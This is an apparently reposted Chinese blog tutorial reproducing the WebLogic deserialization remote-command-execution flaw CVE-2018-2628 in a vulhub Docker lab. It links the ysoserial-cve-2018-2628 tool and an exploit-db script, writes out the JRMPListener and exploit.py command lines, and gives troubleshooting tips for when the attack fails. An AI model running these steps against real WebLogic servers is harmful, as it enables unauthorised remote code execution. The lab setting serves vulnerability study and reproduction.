Weblogic命令執行漏洞(CVE-2018-2628)復現


一、漏洞環境搭建

   CVE-2018-2628影響的軟件版本為:
   Weblogic 10.3.6.0
   Weblogic 12.1.3.0
   Weblogic 12.2.1.2
   Weblogic 12.2.1.3

需要准備的工具如下:

1.docker+vulhub漏洞庫
2.ysoserial-cve-2018-2628,下載鏈接https://github.com/tdy218/ysoserial-cve-2018-2628/releases
3.expolit.py腳本,下載鏈接https://www.exploit-db.com/exploits/44553

這里我使用的Ubuntu18.04虛擬機,直接進入環境

root@admin666-virtual-machine:~/vulhub-master/weblogic/CVE-2018-2628# 

執行命令

root@admin666-virtual-machine:~/vulhub-master/weblogic/CVE-2018-2628#docker-compose up -d

等到出現done即表示搭建完成,可以訪問http://your-ip:7001,出現如下頁面即代表搭建成功!

二、攻擊階段

  攻擊機可以是Linux系統,也可以是Windows系統,在這里使用Windows10本機作為攻擊機,注意:Win10上需要有java環境和python環境(最好是python2,python3可能會運行報錯)

1.在攻擊機上使用ysoserial-cve-2018-2628工具,使用格式如下:

java -cp "ysoserial-0.1-cve-2018-2628-all.jar" ysoserial.exploit.JRMPListener [攻擊機監聽端口] jdk版本編號 "要執行的命令"

注:jdk版本只要大於1.7,直接填Jdk7u21就可以了
執行完后是這個樣子,注意不是所有的命令都可以執行


2.在攻擊機上使用exploit.py,使用格式如下:

python2 exploit.py 靶機IP 端口(默認7001) ysoserial-0.1-cve-2018-2628-all.jar的位置 攻擊機IP 攻擊機監聽端口 JRMPClient

這里為了省事,把這些工具都放在一個目錄下,執行完后是這個樣子

出現這種情況代表已經成功!如果沒成功可能有2個原因:
(1)python版本不對,腳本執行報錯,建議使用python2
(2)主機防火牆開着,靶機可能訪問不了主機監聽的端口,可以試着直接關掉防火牆

三、驗證是否攻擊成功

進入虛擬機環境,輸入docker-compose exec weblogic bash,查看/tmp下是否生成了test文件


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM